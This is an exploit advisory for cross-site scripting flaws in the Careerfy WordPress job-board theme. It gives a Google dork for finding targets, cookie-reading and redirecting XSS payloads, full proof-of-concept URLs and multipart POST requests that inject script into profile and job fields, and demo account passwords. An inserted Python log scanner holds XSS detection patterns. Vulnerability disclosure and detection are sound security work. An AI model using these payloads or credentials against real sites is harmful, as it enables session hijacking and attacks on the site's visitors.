[+] Exploit Title: Careerfy - Job Board WordPress Theme v3.9.0 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/themes/careerfy/
[+] Date: 2020-07-01
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 3.9.0
[+] Software Link: https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An unauthenticated reflected XSS vulnerability and multiple authenticated persistent XSS vulnerabilities were discovered in the Careerfy Job Board theme through version 3.9.0 for WordPress.

[i] The authenticated persistent XSS on the Job page triggers both in the dashboard area (/user-dashboard/?tab=manage-jobs) and on the public job page itself.

[i] Demo account #1 (Candidate @ Careerfy PetCare): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Demo account #2 (Employer @ Careerfy Job Board): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Candidate @ PetCare profile URL: https://careerfy.net/petcare/candidate/vladvector/

[i] Employer @ Job Board profile URL: https://careerfy.net/careerbooster/employer/vladvector/

[i] Employer @ Job Board job URL: https://careerfy.net/careerbooster/job/poc/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?location=[payload]

[x] Authenticated Persistent XSS -> Candidate Profile (vulnerable fields: Academic Level, Age, Salary, Gender, Industry, Full Address)

[x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Member Title, Designation, Experience, Facebook URL, Google+ URL, Twitter URL, LinkedIn URL, Description, Full Address)

[x] Authenticated Persistent XSS -> Job Page (vulnerable fields: Career Level, Experience, Gender, Industry, Qualifications, Job Description, Full Address)



### [ Payloads: ]

[$] " autofocus onfocus=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`; ">

[$] "><img src=x onerror=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;>

[$] "><img src=x onerror="alert(document.cookie);">



### [ PoC Unauthenticated Reflected XSS: ]

[!] https://careerfy.net/petcare/find-help/?location=%22%20autofocus%20onfocus=alert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%20%22%3E&loc_radius=50

[!] GET /petcare/find-help/?location=%22%20autofocus%20onfocus=alert(`VL%CE%9BDV%CE%9ECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;%20%22%3E&loc_radius=50 HTTP/1.1
Host: careerfy.net

[!] https://careerfy.net/careerbooster/jobs-listing/?search_title=&loc_radius=50&location=%22+autofocus+onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B+%22%3E&sector_cat=&job_type=part-time

[!] GET /careerbooster/jobs-listing/?search_title=&loc_radius=50&location=%22+autofocus+onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B+%22%3E&sector_cat=&job_type=part-time HTTP/1.1
Host: careerfy.net
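As an added example (not part of the original advisory), the following check scans web-server access logs for probes of the reflected `location` sink shown above. The log lines are constructed, and the log regex, marker patterns and function names are assumptions for illustration.

```python
"""Scan combined-format access logs for reflected-XSS probes against the
Careerfy `location` search parameter (added example; log lines constructed)."""
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: client, ident, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+')

# Indicators of attribute breakout / tag injection once the value is URL-decoded.
XSS_MARKERS = re.compile(
    r'\bon\w+\s*='                        # inline event handler (onfocus=, onerror=)
    r'|<\s*(?:img|svg|script|iframe)\b'   # tag injected after a closing quote
    r'|document\.cookie|window\.location', # payload bodies seen in the advisory
    re.IGNORECASE)

# Query parameter the advisory identifies as the reflected sink (assumption: only this one).
WATCHED_PARAMS = {"location"}

# Constructed sample lines: two probes from one client, one benign search.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jul/2020:14:48:01 +0000] "GET /petcare/find-help/'
    '?location=%22%20autofocus%20onfocus=alert(document.cookie);%20%22%3E'
    '&loc_radius=50 HTTP/1.1" 200 18342',
    '198.51.100.2 - - [01/Jul/2020:14:49:10 +0000] "GET /careerbooster/jobs-listing/'
    '?search_title=&loc_radius=50&location=Moscow&job_type=part-time HTTP/1.1" 200 20110',
    '203.0.113.7 - - [01/Jul/2020:14:50:32 +0000] "GET /careerbooster/jobs-listing/'
    '?location=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1" 200 19980',
]

def suspicious_params(target):
    """Return {param: decoded value} for watched params that carry XSS markers."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    hits = {}
    for name in WATCHED_PARAMS:
        for value in qs.get(name, []):   # parse_qs already percent-decodes
            if XSS_MARKERS.search(value):
                hits[name] = value
    return hits

def scan_log(lines):
    """Yield (client, path, param, decoded value) for each matching request."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, value in suspicious_params(m.group("target")).items():
            yield (m.group("client"), urlsplit(m.group("target")).path, param, value)

def offenders(lines):
    """Count matching requests per client address, for triage and blocking decisions."""
    counts = {}
    for client, _path, _param, _value in scan_log(lines):
        counts[client] = counts.get(client, 0) + 1
    return counts

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print(offenders(SAMPLE_LOG))
```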



### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /petcare/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------122256774439635172062989578806
Content-Length: 5335
Origin: https://careerfy.net
Referer: https://careerfy.net/petcare/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"

01-07-2020
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_phone"

OK
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="dial_code"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_sector"

41
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

XSS
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_bio"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="academic-level"

masters-degree"><img src=x onerror=alert(document.cookie);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="Age"

18-22-years"><img src=x onerror=alert(document.domain);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="salary"

1337"><img src=x onerror=alert(`VLΛDVΞCTOR`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="gender"

hacker"><img src=x onerror=alert(`YAY!`);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="industry"

web-security"><img src=x onerror=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_twitter_url"

https://twitter.com/vlad_vector
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"><img src=x onerror=alert(`VLΛDVΞCTOR`);alert(document.cookie);>
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_lat"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_lng"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

0
-----------------------------122256774439635172062989578806
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------122256774439635172062989578806--



### [ PoC Authenticated Persistent XSS -> Employer Profile: ]

[!] POST /careerbooster/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------207058957013654520581670329262
Content-Length: 5853
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_phone"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="dial_code"

7
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="contry_iso_code"

ru
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_website"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_sector"

33
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_mm"

7
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_dob_yy"

2020
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_bio"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="founded-since"

2018
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_location3"

Moscow
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_address"

OK"><img src=x onerror=alert(document.cookie);window.location=`https://twitter.com/vlad_vector`;>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: image/jpeg


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

1337"><img src=x onerror=alert(document.domain);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

1337"><img src=x onerror=alert(document.cookie);>
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------207058957013654520581670329262
Content-Disposition: form-data; name="terms_cond_check"

on
-----------------------------207058957013654520581670329262--



### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /careerbooster/user-dashboard/?tab=user-job&job_id=5038&action=update HTTP/1.1
Host: careerfy.net
Content-Type: multipart/form-data; boundary=---------------------------5410881451781327061235735546
Content-Length: 4680
Origin: https://careerfy.net
Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=user-job&job_id=5038&action=update
Cookie: [cookies_here]

-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_detail"

PoC
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="application_deadline"

July 2, 2020 2:48 pm"><img src=x onerror=alert(document.cookie);>
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_sector"

33
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_type"

21
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="get_job_skills[]"

Developer"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_type"

internal"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_url"


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_apply_email"


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary"

13
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_max_salary"

13
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="offered-salary"


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="career-level"

officer"><img src=x onerror="alert(document.domain);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="experience"

less-than-1-year"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="gender"

male"><img src=x onerror="alert(document.domain);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="Industry"

development"><img src=x onerror="alert(document.cookie);">
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="qualifications"

certificate"><img src=x onerror=alert(document.domain); >
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location1"

Russian Federation
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location2"

Moscow
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_location3"

Moscow
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"><img src=x onerror=alert(`VLADVECTOR`);alert(document.cookie);window.location=`https://twitter.com/vlad_vector`; >
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_lat"

55.761035
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_lng"

37.536004
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

9.719789233510344
-----------------------------5410881451781327061235735546
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------5410881451781327061235735546--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector